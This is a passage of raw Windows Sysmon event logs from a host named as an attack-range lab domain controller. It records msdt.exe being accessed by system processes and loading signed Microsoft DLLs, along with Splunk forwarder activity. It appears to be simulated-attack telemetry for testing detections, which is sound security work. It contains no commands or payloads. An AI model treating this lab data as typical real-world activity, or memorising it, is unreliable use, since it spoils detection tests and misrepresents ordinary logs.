Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F77A534C91F1E1EF8B400E5A63DE7FB0,SHA256=333902F9D654E0FB566CC37CA072ED31269706B4474C3E552E656244D1CB1D39,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000099071Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:28.561{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A54F22276FDB9181F992F78926B0C3FA,SHA256=9055D83D410EAA7812CF6DF06AC21B74B522FF096AF17A7B654336B1A62F20A1,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000099073Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:29.655{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=300BB66BF5FE4CEAC1946871CB899645,SHA256=E80C1C3D6454EC0FD196F96D8F50AC712C99B0C79388B155FF9A3E39073A5B15,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000099072Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:26.082{326FD73D-A455-6294-3701-000000005502}6180C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-994.attackrange.local53328-false10.0.1.12-8000- 23542300x800000000000000099074Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:30.749{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=72F27C410D349D0167C3571491D8D446,SHA256=9E58589264CD8E8039BFAF0A419CF40CA72C7A93B4E61424BEFD80E6A3CC4C4D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000099075Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:31.844{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0A8588FE6F5C0314CA19F75A8B8FFF2F,SHA256=6033423AE004F76B66C75CD658D3EB27A975242758AA327876382CEB5D58F623,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000099076Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:32.938{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F8B774E6326C9D174E273986C1018125,SHA256=8E65A62E2DEF5539790A4576ADF4E4899B93C009C0E2203C5C6B2D50E42A1415,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000099151Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:34.594{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=085CC151B3CB36B536C2FF16ED6146A6,SHA256=432FACB7D0E4A520ADD0737EDA7535AC87C86A4C77261EC554FDCD6AFE7384AF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000099150Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:34.453{326FD73D-A441-6294-EB00-000000005502}48007160C:\Windows\Explorer.EXE{326FD73D-C0E2-6294-370B-000000005502}5132C:\WINDOWS\system32\msdt.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+e9b5f|C:\Windows\System32\SHELL32.dll+eb6a5|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bf3f|C:\Windows\System32\windows.storage.dll+13accb|C:\Windows\System32\windows.storage.dll+1391ef|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000099149Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:34.453{326FD73D-A441-6294-EB00-000000005502}48007160C:\Windows\Explorer.EXE{326FD73D-C0E2-6294-370B-000000005502}5132C:\WINDOWS\system32\msdt.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+eb5be|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bf3f|C:\Windows\System32\windows.storage.dll+13accb|C:\Windows\System32\windows.storage.dll+1391ef|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000099148Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:34.453{326FD73D-A441-6294-EB00-000000005502}48007160C:\Windows\Explorer.EXE{326FD73D-C0E2-6294-370B-000000005502}5132C:\WINDOWS\system32\msdt.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+e9db4|C:\Windows\System32\SHELL32.dll+eb587|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bf3f|C:\Windows\System32\windows.storage.dll+13accb|C:\Windows\System32\windows.storage.dll+1391ef|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000099147Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:34.453{326FD73D-A441-6294-EB00-000000005502}48006220C:\Windows\Explorer.EXE{326FD73D-C0E2-6294-370B-000000005502}5132C:\WINDOWS\system32\msdt.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+e9b5f|C:\Windows\System32\SHELL32.dll+eb6a5|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bf3f|C:\Windows\System32\windows.storage.dll+13accb|C:\Windows\System32\windows.storage.dll+1391ef|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000099146Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:34.453{326FD73D-A441-6294-EB00-000000005502}48006220C:\Windows\Explorer.EXE{326FD73D-C0E2-6294-370B-000000005502}5132C:\WINDOWS\system32\msdt.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+eb5be|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bf3f|C:\Windows\System32\windows.storage.dll+13accb|C:\Windows\System32\windows.storage.dll+1391ef|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000099145Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:34.453{326FD73D-A441-6294-EB00-000000005502}48006220C:\Windows\Explorer.EXE{326FD73D-C0E2-6294-370B-000000005502}5132C:\WINDOWS\system32\msdt.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+e9db4|C:\Windows\System32\SHELL32.dll+eb587|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bf3f|C:\Windows\System32\windows.storage.dll+13accb|C:\Windows\System32\windows.storage.dll+1391ef|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000099144Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:34.453{326FD73D-A441-6294-EB00-000000005502}48006220C:\Windows\Explorer.EXE{326FD73D-C0E2-6294-370B-000000005502}5132C:\WINDOWS\system32\msdt.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bf3f|C:\Windows\System32\windows.storage.dll+13accb|C:\Windows\System32\windows.storage.dll+1391ef|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000099143Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:34.438{326FD73D-A441-6294-E600-000000005502}44004484C:\Windows\system32\taskhostw.exe{326FD73D-C0E2-6294-370B-000000005502}5132C:\WINDOWS\system32\msdt.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d812|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000099142Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:34.438{326FD73D-A441-6294-E600-000000005502}44004484C:\Windows\system32\taskhostw.exe{326FD73D-C0E2-6294-370B-000000005502}5132C:\WINDOWS\system32\msdt.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d812|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000099141Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:34.438{326FD73D-A441-6294-EB00-000000005502}48004500C:\Windows\Explorer.EXE{326FD73D-C0E2-6294-370B-000000005502}5132C:\WINDOWS\system32\msdt.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+e9b5f|C:\Windows\System32\SHELL32.dll+ebd30|C:\Windows\System32\TwinUI.dll+100021|C:\Windows\System32\TwinUI.dll+10088f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000099140Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:34.422{326FD73D-A441-6294-EB00-000000005502}48004500C:\Windows\Explorer.EXE{326FD73D-C0E2-6294-370B-000000005502}5132C:\WINDOWS\system32\msdt.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+81330|C:\Windows\System32\SHELL32.dll+ebcec|C:\Windows\System32\TwinUI.dll+100021|C:\Windows\System32\TwinUI.dll+10088f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000099139Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:34.422{326FD73D-A441-6294-EB00-000000005502}48004500C:\Windows\Explorer.EXE{326FD73D-C0E2-6294-370B-000000005502}5132C:\WINDOWS\system32\msdt.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+e9db4|C:\Windows\System32\SHELL32.dll+ebcc0|C:\Windows\System32\TwinUI.dll+100021|C:\Windows\System32\TwinUI.dll+10088f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000099138Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:34.422{326FD73D-A441-6294-EB00-000000005502}48004500C:\Windows\Explorer.EXE{326FD73D-C0E2-6294-370B-000000005502}5132C:\WINDOWS\system32\msdt.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+ffe59|C:\Windows\System32\TwinUI.dll+10088f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000099137Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:34.422{326FD73D-A253-6294-0B00-000000005502}632844C:\Windows\system32\lsass.exe{326FD73D-C0E2-6294-370B-000000005502}5132C:\WINDOWS\system32\msdt.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\lsasrv.dll+262f7|C:\Windows\system32\lsasrv.dll+2743d|C:\Windows\system32\lsasrv.dll+26175|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000099136Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:34.422{326FD73D-A253-6294-0B00-000000005502}632844C:\Windows\system32\lsass.exe{326FD73D-C0E2-6294-370B-000000005502}5132C:\WINDOWS\system32\msdt.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2c06f|C:\Windows\system32\lsasrv.dll+260bd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 734700x800000000000000099135Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:34.422{326FD73D-C0E2-6294-370B-000000005502}5132C:\Windows\System32\msdt.exeC:\Windows\System32\xmllite.dll10.0.14393.3143 (rs1_release.190725-1725)Microsoft XmlLite LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationXmlLite.dllMD5=64E301CCFADF34810ADA8DE9DBC7720F,SHA256=6EAE1E0E610793C7DF2B27795553F377D2C4126CF74D8EE4A84DE3C3150871F8,IMPHASH=B53F82B33CA6ABD6251152A46E5FF78CtrueMicrosoft WindowsValid 734700x800000000000000099134Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:34.406{326FD73D-C0E2-6294-370B-000000005502}5132C:\Windows\System32\msdt.exeC:\Windows\System32\oleacc.dll7.2.14393.4169 (rs1_release.210107-1130)Active Accessibility Core ComponentMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEACC.DLLMD5=1B04659F0A22BFE9142B6AD36467ACEA,SHA256=67BC7C19D71FB98A7B5882B0F2BFC8F2E4491B4ACBE23EE545D54FFCAEC808E9,IMPHASH=427F18493D540CBF4092BD07A97BE51FtrueMicrosoft WindowsValid 734700x800000000000000099133Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:34.406{326FD73D-C0E2-6294-370B-000000005502}5132C:\Windows\System32\msdt.exeC:\Windows\System32\atlthunk.dll10.0.14393.2969 (rs1_release.190503-1820)atlthunk.dllMicrosoft® Windows® Operating SystemMicrosoft Corporationatlthunk.dllMD5=BECA5E9FA540246333036919A57B7AEF,SHA256=62C24B274B38A88C83EE122CB30142C2135953C1A26582AD003512B238CB7FC9,IMPHASH=E86BAF1A171668A11110B8975A3BDE27trueMicrosoft WindowsValid 734700x800000000000000099132Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:34.406{326FD73D-C0E2-6294-370B-000000005502}5132C:\Windows\System32\msdt.exeC:\Windows\System32\xmllite.dll10.0.14393.3143 (rs1_release.190725-1725)Microsoft XmlLite LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationXmlLite.dllMD5=64E301CCFADF34810ADA8DE9DBC7720F,SHA256=6EAE1E0E610793C7DF2B27795553F377D2C4126CF74D8EE4A84DE3C3150871F8,IMPHASH=B53F82B33CA6ABD6251152A46E5FF78CtrueMicrosoft WindowsValid 734700x800000000000000099131Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:34.406{326FD73D-C0E2-6294-370B-000000005502}5132C:\Windows\System32\msdt.exeC:\Windows\System32\dwmapi.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft Desktop Window Manager APIMicrosoft® Windows® Operating SystemMicrosoft Corporationdwmapi.dllMD5=74621C6ABE4E9A568DF0A38E7282D71E,SHA256=0788A092D47800D0EB120A7DBB9E59234D0722A4A2E80ECE6CE70E3A84A3750A,IMPHASH=ADB9F71ACD4F7D3CF761AB6C59A7F1E5trueMicrosoft WindowsValid 734700x800000000000000099130Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:34.406{326FD73D-C0E2-6294-370B-000000005502}5132C:\Windows\System32\msdt.exeC:\Windows\System32\msctf.dll10.0.14393.4530 (rs1_release.210705-0736)MSCTF Server DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationMSCTF.DLLMD5=E2374A214A9F0C8347C29EBDE3447986,SHA256=F2260FE7E0C4E92D49CF0F550E2A1B3D3F1D2D76E6F5C8F16B0E16B6117D9EE1,IMPHASH=EB898F83C3A5D6877A523BC64B41CB06trueMicrosoft WindowsValid 734700x800000000000000099129Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:34.406{326FD73D-C0E2-6294-370B-000000005502}5132C:\Windows\System32\msdt.exeC:\Windows\System32\msftedit.dll10.0.14393.4704 (rs1_release.211004-1917)Rich Text Edit Control, v8.5Microsoft® Windows® Operating SystemMicrosoft CorporationMsftEdit.DLLMD5=76AA789092145B52D12BF1B1E8658294,SHA256=8116A9DDDA0090327E537D1C87EE3C6A1716B6228AD20F71665F0E493ACD47EF,IMPHASH=7C36F76BEB38B735155D539BEBF60532trueMicrosoft WindowsValid 10341000x800000000000000099128Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:34.406{326FD73D-A254-6294-1600-000000005502}13003216C:\Windows\system32\svchost.exe{326FD73D-C0E2-6294-370B-000000005502}5132C:\WINDOWS\system32\msdt.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000099127Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:34.406{326FD73D-A254-6294-1600-000000005502}13001356C:\Windows\system32\svchost.exe{326FD73D-C0E2-6294-370B-000000005502}5132C:\WINDOWS\system32\msdt.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000099126Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:34.391{326FD73D-A253-6294-0B00-000000005502}632844C:\Windows\system32\lsass.exe{326FD73D-C0E2-6294-370B-000000005502}5132C:\WINDOWS\system32\msdt.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 734700x800000000000000099125Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:34.391{326FD73D-C0E2-6294-370B-000000005502}5132C:\Windows\System32\msdt.exeC:\Windows\System32\imm32.dll10.0.14393.0 (rs1_release.160715-1616)Multi-User Windows IMM32 API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationimm32MD5=E1024CF2E35DD3467F52BC83F7FEDA3F,SHA256=59C87761AD509BD096C2F35257C2370FB94B95160CB63FB9E66DFD8210AB002A,IMPHASH=C852E8FD14D356C81F834E318EEAD7FAtrueMicrosoft WindowsValid 734700x800000000000000099124Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:34.391{326FD73D-C0E2-6294-370B-000000005502}5132C:\Windows\System32\msdt.exeC:\Windows\System32\sspicli.dll10.0.14393.5006 (rs1_release.220301-1704)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsspicli.dllMD5=F0258C58C8DC45AF9B5AAF9BA49E0C53,SHA256=8E1EAA39742CC0E97D615229E9C13C8447B8D115B4678A1F03BE3E8E20345521,IMPHASH=4B1C9487A6420C18F688F0EC5BEB6F33trueMicrosoft WindowsValid 734700x800000000000000099123Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:34.391{326FD73D-C0E2-6294-370B-000000005502}5132C:\Windows\System32\msdt.exeC:\Windows\System32\dui70.dll10.0.14393.4169 (rs1_release.210107-1130)Windows DirectUI EngineMicrosoft® Windows® Operating SystemMicrosoft CorporationDUI70.DLLMD5=C3DC010AC7F5880CC7BE626566FC4130,SHA256=3ED6E9D0AF769B0BFBE94DFF4CC07A94A81271133FBB60C9EB02676C92FFB87E,IMPHASH=E76D3161885DD9D13E8514AFC7BF3853trueMicrosoft WindowsValid 734700x800000000000000099122Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:34.378{326FD73D-C0E2-6294-370B-000000005502}5132C:\Windows\System32\msdt.exeC:\Windows\System32\duser.dll10.0.14393.0 (rs1_release.160715-1616)Windows DirectUser EngineMicrosoft® Windows® Operating SystemMicrosoft CorporationDUser.DLLMD5=42D5E1F8641E9DCEE0D8751F6F7A8961,SHA256=9168110EF404BF179888AF4A0F02B2817F020BFB16351778F2DDD6915C92F190,IMPHASH=9134DC493583245CFD7E3B68926C19D0trueMicrosoft WindowsValid 734700x800000000000000099121Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:34.378{326FD73D-C0E2-6294-370B-000000005502}5132C:\Windows\System32\msdt.exeC:\Windows\System32\cabinet.dll5.00 (rs1_release.160715-1616)Microsoft® Cabinet File APIMicrosoft® Windows® Operating SystemMicrosoft Corporationcabinet.dllMD5=08A4A2712DB2AE10E483FB74E46B0E73,SHA256=EEB32E3E4256CC9935227ACD5BA576B75F1F6FE3C818D2127513CB22F823FECB,IMPHASH=536E202FBC448C2C3B40D60D87620951trueMicrosoft WindowsValid 734700x800000000000000099120Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:34.378{326FD73D-C0E2-6294-370B-000000005502}5132C:\Windows\System32\msdt.exeC:\Windows\System32\winhttp.dll10.0.14393.5006 (rs1_release.220301-1704)Windows HTTP ServicesMicrosoft® Windows® Operating SystemMicrosoft Corporationwinhttp.dllMD5=54658E22186450946F304FE8BB408BBB,SHA256=1877859D1B72E18784982F4254C8DAE24F15186D3CA74680E7915E53D50800A1,IMPHASH=35501E61EE90F9745FCEA0F1F844350FtrueMicrosoft WindowsValid 734700x800000000000000099119Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:34.378{326FD73D-C0E2-6294-370B-000000005502}5132C:\Windows\System32\msdt.exeC:\Windows\System32\crypt32.dll10.0.14393.4946 (rs1_release.220131-0721)Crypto API32Microsoft® Windows® Operating SystemMicrosoft 